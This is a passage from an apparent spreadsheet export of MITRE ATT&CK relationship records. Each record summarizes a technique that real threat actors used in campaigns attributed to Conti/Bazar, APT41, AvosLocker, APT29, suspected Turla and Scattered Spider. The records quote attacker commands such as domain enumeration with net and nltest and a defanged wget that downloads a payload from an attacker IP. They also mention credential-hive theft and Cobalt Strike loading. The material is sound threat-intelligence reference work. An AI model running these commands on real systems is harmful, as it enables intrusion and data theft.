    <t xml:space="preserve">During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors limited [Rclone](https://attack.mitre.org/software/S1040)'s bandwidth setting during exfiltration.(Citation: DFIR Conti Bazar Nov 2021) </t>
  </si>
  <si>
    <t>relationship--ca476de5-e17e-4011-9e5b-b438299c385c</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors obtained files and data from the compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--576f0fb4-4cd7-467b-9208-3977321705e4</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors collected files from network shared drives prior to network encryption.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--d3720380-6d0d-41a9-a2b5-e0fcc311f486</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors use the command `net group "domain admins" /dom` to enumerate domain groups.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--6317e636-4766-4968-ac4b-66b1a7199250</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--fc3d0026-20b2-4d38-b276-64d7290c1994</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.(Citation: DFIR Conti Bazar Nov 2021) </t>
  </si>
  <si>
    <t>relationship--74afa3c9-bfa3-48a3-85bf-b28e5ecd00b7</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</si>
  <si>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</si>
  <si>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relationship--3d4490e3-d3fe-4c2e-8c41-69ebbf8d060e</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--135fb6c4-1f42-42ce-b323-22e57ae4fbc6</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors downloaded additional tools and files onto a compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--69bfbe2b-2a2a-4013-9fba-7a551ec75836</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--eb2b318e-2968-485e-8459-1b40c74baf83</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used WMI to load [Cobalt Strike](https://attack.mitre.org/software/S0154) onto additional hosts within a compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--e7187197-205f-496f-b41c-34d57c52a997</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--4dcb70d9-017b-44b8-a13c-fab275c5bc56</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `net localgroup "adminstrator" ` to identify accounts with local administrator rights.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--5968f7a6-a300-4a1b-9a4e-655e9300392b</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors relied on users to enable macros within a malicious Microsoft Word document.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--4a98aeee-5b53-43ca-a75a-5839792756d7</t>
  </si>
  <si>
    <t xml:space="preserve">For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used [Cobalt Strike](https://attack.mitre.org/software/S0154) and [Conti](https://attack.mitre.org/software/S0575) ransomware.(Citation: DFIR Conti Bazar Nov 2021) </t>
  </si>
  <si>
    <t>relationship--bfb6dc5a-786f-47e8-ab9c-848a643df423</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--f2a58ddd-c9d8-4769-a93b-2e876e304105</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `mshta` to execute DLLs.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--ff9fad0d-7481-4804-a4e8-800265a5c17d</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors executed the PowerView ShareFinder module to identify open shares.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--05c33a7a-bfd0-4374-a617-f2c407461acb</t>
  </si>
  <si>
    <t>03 October 2022</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used Base64-encoded strings.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--a81df141-ff2a-4be9-a6ea-c5b19d29bc0e</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--5b0329a9-aebd-4216-94d8-a39021139b80</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors employed code that used `regsvr32` for execution.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--bcbf0e6a-3566-4704-986f-caf0af38741d</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors installed the AnyDesk remote desktop application onto the compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--d35f97c3-2776-4f7a-9dfa-be39009ea5c0</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used RDP to access specific network hosts of interest.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--c4275eb1-4651-4c47-bc14-82a4b7ceec2b</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--e79f7f56-3a5e-4957-8070-360f630f3c2e</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors loaded DLLs via `rundll32` using the `svchost` process.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--511ed53b-8445-4da7-8890-49d1b4e98077</t>
  </si>
  <si>
    <t>For [C0015](https://attack.mitre.org/campaigns/C0015), security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--538eb3a4-466e-42d0-9f12-bd9b6de0abe4</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.(Citation: DFIR Conti Bazar Nov 2021) </t>
  </si>
  <si>
    <t>relationship--e8312c6b-a855-48c4-b5cc-8e369bcfd475</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used the command `net view /all time` to gather the local time of a compromised network.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--c5e582d2-aea4-4828-8b9c-5bfe1ca72504</t>
  </si>
  <si>
    <t>For [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors obtained a variety of tools, including [AdFind](https://attack.mitre.org/software/S0552),  AnyDesk, and Process Hacker.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--e9ff50dd-6367-43b1-9f75-1dee4028df84</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--7d2c1704-b190-4b47-854c-5c1e122fa5ce</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `cmd.exe` to execute commands and run malicious binaries.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--b6129b4d-09bd-46f6-b7c4-1500b0e61535</t>
  </si>
  <si>
    <t>During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used `wmic` and `rundll32` to load [Cobalt Strike](https://attack.mitre.org/software/S0154) onto a target host.(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--0a764574-6288-4f66-b4af-b485424b32d2</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--c372d356-6d5d-4454-b6b4-8297d0da1579</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) hex-encoded PII data prior to exfiltration.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--e9249ab2-eeee-4984-9ee2-78ff52335077</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.(Citation: Mandiant APT41) </t>
  </si>
  <si>
    <t>relationship--7cea5a77-cfb2-4e14-88da-ca936433ada0</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</si>
  <si>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</si>
  <si>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relationship--7d76cecb-4eec-46ea-8ca7-9844b1b0b3e6</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the DUSTPAN loader to decrypt embedded payloads.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--4a8098a6-da49-4a36-805b-acce98efa827</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used its Cloudflare services C2 channels for data exfiltration.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--699d04f6-bace-4bf8-af2a-c80c62fcdd23</t>
  </si>
  <si>
    <t>04 January 2023</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--6c10da0b-4dfd-4389-b3e3-3599a2fab859</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used Cloudflare services for data exfiltration.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--cb68b950-31f1-4ed7-b184-b9208588648a</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</si>
  <si>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</si>
  <si>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relationship--3f22638d-1003-44d6-a46e-eab83b966834</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) abused named pipe impersonation for privilege escalation.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--6e5eec36-c9d9-490c-a6ba-3b13971ffce8</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</si>
  <si>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</si>
  <si>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relationship--84f6c3c2-8758-4179-98ca-74e9f726fe7d</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) downloaded malicious payloads onto compromised systems.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--fc62b2fc-0a10-436e-b50a-49d708ac072f</t>
  </si>
  <si>
    <t>25 January 2023</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) deployed JScript web shells on compromised systems.(Citation: Mandiant APT41)
</t>
  </si>
  <si>
    <t>relationship--80516f0f-53de-4058-9ae5-d426adb9e99e</t>
  </si>
  <si>
    <t>09 December 2022</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) copied the local `SAM` and `SYSTEM` Registry hives to a staging directory.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--7014e092-7f05-4f0a-9c6d-f264bf76de7b</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `SCHTASKS  /Change` to modify legitimate scheduled tasks to run malicious code.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--20a9afe3-de36-428e-a054-cce863b2f4e9</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</si>
  <si>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</si>
  <si>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relationship--8996ab0b-8bc5-4c17-9bd5-a29b6c771f62</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</si>
  <si>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</si>
  <si>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relationship--662e03e7-a7bb-4c5b-ada4-e00275885fbb</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</si>
  <si>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</si>
  <si>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relationship--b315cea7-6ca6-4d59-83e5-c91f635bbeb4</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the Cloudflare CDN to proxy C2 traffic.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--8756af3a-a756-4e0d-a537-8cab1e983b9b</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</si>
  <si>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</si>
  <si>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relationship--3c331c9b-bd73-422b-a62a-560d92946d5b</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) copied the `SAM` and `SYSTEM` Registry hives for credential harvesting.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--4fd8f00b-2524-4c93-b49d-2f43cbe4aa5b</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used VMProtect to slow the reverse engineering of malicious binaries.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--191364fd-6564-4adc-a717-cfec6b13f438</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) issued `ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+` commands to find the volume serial number of compromised systems.(Citation: Mandiant APT41)
</t>
  </si>
  <si>
    <t>relationship--118cdbd1-12e5-4ac2-85a3-c574e7cfad91</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `cmd.exe /c ping %userdomain%` for discovery.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--30ea6fe2-2947-4d12-b959-5a59c9e8d812</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `whoami` to gather information from victim machines.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--208b9e1d-3de9-4de8-b8d4-e3a7ff3c72ec</t>
  </si>
  <si>
    <t>For [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--eb6f9345-0600-4afb-99db-cdfbc0d6bc18</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.(Citation: Mandiant APT41)
</t>
  </si>
  <si>
    <t>relationship--75565ab8-1381-4ead-999f-e1df54f61d79</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used the Cloudflare services for C2 communications.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--ff4440ce-f6b6-4e59-9333-4f4a3b96a2e4</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) deployed JScript web shells through the creation of malicious ViewState objects.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--4a6869c9-4261-44ca-83e0-b87e047af6b9</t>
  </si>
  <si>
    <t>During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used `cmd.exe` to execute reconnaissance commands.(Citation: Mandiant APT41)</t>
  </si>
  <si>
    <t>relationship--a686a939-b320-4326-bae1-8df65254ae46</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used Base64 to encode their PowerShell scripts.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--905e27bb-8d9b-4185-b5e6-4febc5d17333</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used [AvosLocker](https://attack.mitre.org/software/S1053) ransomware to encrypt files on the compromised network.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--6cfee0a9-4f55-42e9-8670-86a0fa3e6280</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</si>
  <si>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</si>
  <si>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relationship--237d7c2e-503a-420c-bf94-047f5c42a646</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</si>
  <si>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</si>
  <si>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relationship--e5421609-48cf-4e8e-8843-de6043e920f4</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--578433f2-d3d3-4434-8b6c-986c14204b92</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), [AvosLocker](https://attack.mitre.org/software/S1053) was disguised using the victim company name as the filename.(Citation: Cisco Talos Avos Jun 2022)</t>
  </si>
  <si>
    <t>relationship--ed149b2f-6743-4d06-b869-158c0f96746e</t>
  </si>
  <si>
    <t>24 January 2023</t>
  </si>
  <si>
    <t>For [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors renamed a [Sliver](https://attack.mitre.org/software/S0633) payload to `vmware_kb.exe`.(Citation: Cisco Talos Avos Jun 2022)</t>
  </si>
  <si>
    <t>relationship--3564dc8e-09d0-4855-8a90-d4c28a9488e5</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used the SoftPerfect Network Scanner for network scanning.(Citation: Cisco Talos Avos Jun 2022)</t>
  </si>
  <si>
    <t>relationship--73d4dcf0-5c97-4b60-af21-b68182237e15</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections.(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--42af62e7-3e38-46e7-ac70-c557f33d377d</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used encoded PowerShell scripts for execution.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--76c260cd-7cc8-4333-a253-e19b953c8291</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used AnyDesk to transfer tools between systems.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--4e341596-3bc3-4d9e-a9a3-2aceccfebe35</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors opened a variety of ports to establish RDP connections, including ports 28035, 32467, 41578, and 46892.(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--4bc4f37e-5cdd-4def-a997-1cbb37975a8f</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used `rundll32` to run [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--fe26276a-d93c-400b-8907-1fcc9415ee38</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used PDQ Deploy to move [AvosLocker](https://attack.mitre.org/software/S1053) and tools across the network.(Citation: Cisco Talos Avos Jun 2022)</t>
  </si>
  <si>
    <t>relationship--e2ac0292-0de5-4805-9ff8-f56881331295</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors ran `nslookup` and Advanced IP Scanner on the target network.(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--bcf2759f-2e3b-4caf-bfcb-2e7d8b533b2d</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors collected `whoami` information via PowerShell scripts.(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--5cab522f-3469-4f57-97c5-f333c63691c0</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</si>
  <si>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</si>
  <si>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relationship--c0c1a394-23db-44cf-a922-89e10ba13ec6</t>
  </si>
  <si>
    <t>During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used HTTP for C2 communications.(Citation: Costa AvosLocker May 2022)</t>
  </si>
  <si>
    <t>relationship--c9a5f585-541d-4785-9cb4-de9710311176</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</si>
  <si>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</si>
  <si>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relationship--f95453f6-4b23-4ec4-bd76-7f44bca126b4</t>
  </si>
  <si>
    <t>During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used SSL via TCP port 443 for C2 communications.(Citation: FireEye APT29 Nov 2018)</t>
  </si>
  <si>
    <t>relationship--ba18c3d0-049b-40c0-b65f-fe0463b3a9d6</t>
  </si>
  <si>
    <t>During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used encoded PowerShell commands.(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)</t>
  </si>
  <si>
    <t>relationship--38ecb5dd-08b5-45ca-b048-9c4ba6f842fc</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</si>
  <si>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</si>
  <si>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relationship--a575b110-f622-4813-9fa7-bef6287bcb7b</t>
  </si>
  <si>
    <t>For [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors registered domains for use in C2.(Citation: FireEye APT29 Nov 2018)</t>
  </si>
  <si>
    <t>relationship--07ef3f89-c78a-4aa0-a77e-842c5220244b</t>
  </si>
  <si>
    <t>For [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used legitimate but compromised domains to host malicious payloads.(Citation: Microsoft Unidentified Dec 2018)</t>
  </si>
  <si>
    <t>relationship--44e0a8c6-ccb4-4d4e-bcf0-0709f10dec51</t>
  </si>
  <si>
    <t>For [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors embedded a base64-encoded payload within a LNK file.(Citation: Microsoft Unidentified Dec 2018)</t>
  </si>
  <si>
    <t>relationship--f5e601f7-5f7a-4888-9e90-e7f815d5013c</t>
  </si>
  <si>
    <t>05 April 2023</t>
  </si>
  <si>
    <t xml:space="preserve">During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors downloaded additional tools and files onto victim machines.(Citation: Microsoft Unidentified Dec 2018)(Citation: FireEye APT29 Nov 2018) </t>
  </si>
  <si>
    <t>relationship--961bbfd6-e487-4628-9956-5b497e622ae1</t>
  </si>
  <si>
    <t>During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors lured users into clicking a malicious link which led to the download of a  ZIP archive containing a malicious .LNK file.(Citation: FireEye APT29 Nov 2018)</t>
  </si>
  <si>
    <t>relationship--5610e19c-de2e-4b9d-9e10-776e94528b0d</t>
  </si>
  <si>
    <t>During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used TCP for some C2 communications.(Citation: FireEye APT29 Nov 2018)</t>
  </si>
  <si>
    <t>relationship--6daa0c15-e73b-4b0f-8069-8f89638bf6fd</t>
  </si>
  <si>
    <t>During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used obfuscated PowerShell to extract an encoded payload from within an .LNK file.(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)</t>
  </si>
  <si>
    <t>relationship--c8bc8331-513b-40e1-a82b-67107d2babd4</t>
  </si>
  <si>
    <t>During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used `rundll32.exe` to execute the [Cobalt Strike](https://attack.mitre.org/software/S0154) Beacon loader DLL.(Citation: FireEye APT29 Nov 2018)</t>
  </si>
  <si>
    <t>relationship--0e8a4965-f609-4cf1-bded-2b4a1ef5c5f3</t>
  </si>
  <si>
    <t>During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors sent phishing emails with unique malicious links, likely for tracking victim clicks.(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)</t>
  </si>
  <si>
    <t>relationship--aafab4f1-96d9-4c9e-8f87-98a38db520fe</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</si>
  <si>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</si>
  <si>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relationship--747f1dcd-7af4-4a38-983b-e2d6108af677</t>
  </si>
  <si>
    <t>For [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors uploaded malware to websites under their control.(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)</t>
  </si>
  <si>
    <t>relationship--895ab8e5-8f5f-420f-b283-61ee0d7ac37a</t>
  </si>
  <si>
    <t>During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used HTTP for some of their C2 communications.(Citation: FireEye APT29 Nov 2018)</t>
  </si>
  <si>
    <t>relationship--889f0ae5-cf9f-4418-8181-ebee62d64afb</t>
  </si>
  <si>
    <t>During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors used WinRAR to collect documents on targeted systems. The threat actors appeared to only exfiltrate files created after January 1, 2021.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--929a1429-88a6-4ac8-b92e-39f242b1e0d6</t>
  </si>
  <si>
    <t>During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors split encrypted archives containing stolen files and information into 3MB parts prior to exfiltration.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--42d043a1-0b6f-4acd-aea2-553579eb49c2</t>
  </si>
  <si>
    <t>25 July 2023</t>
  </si>
  <si>
    <t>During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors collected documents from compromised hosts.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--ff746d3d-2ebe-46e9-87f6-5ddd8abbfda3</t>
  </si>
  <si>
    <t>22 May 2023</t>
  </si>
  <si>
    <t>For [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors re-registered expired C2 domains previously used for [ANDROMEDA](https://attack.mitre.org/software/S1074) malware.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--94dc4d8d-c6a9-4b0a-9562-07cdf0347805</t>
  </si>
  <si>
    <t>15 May 2023</t>
  </si>
  <si>
    <t>During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors re-registered a ClouDNS dynamic DNS subdomain which was previously used by [ANDROMEDA](https://attack.mitre.org/software/S1074).(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--6d550704-4ccb-485b-8e79-519d13768afa</t>
  </si>
  <si>
    <t>During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors downloaded malicious payloads onto select compromised hosts.(Citation: Mandiant Suspected Turla Campaign February 2023)</t>
  </si>
  <si>
    <t>relationship--a8fd0806-56eb-4438-bcce-18f7851a07c6</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</si>
  <si>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</si>
  <si>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relationship--b546ebe4-90cb-4e2f-92fe-2d1c019f44c4</t>
  </si>
  <si>
    <t>22 September 2023</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used IAM manipulation to gain persistence and to assume or elevate privileges.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--4e23f18f-9418-462d-9f59-a527cb15ba9d</t>
  </si>
  <si>
    <t>07 July 2023</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</si>
  <si>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</si>
  <si>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relationship--050f4038-bed5-4353-970c-d32be292a037</t>
  </si>
  <si>
    <t>During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) leveraged compromised credentials from victim users  to authenticate to Azure tenants.(Citation: Crowdstrike TELCO BPO Campaign December 2022)</t>
  </si>
  <si>
    <t>relationship--86c9276e-1144-42b9-971f-8ba4eefec3be</t>
  </si>
  <si>
    <t>10 October 2023</t>
  </si>
  <si>
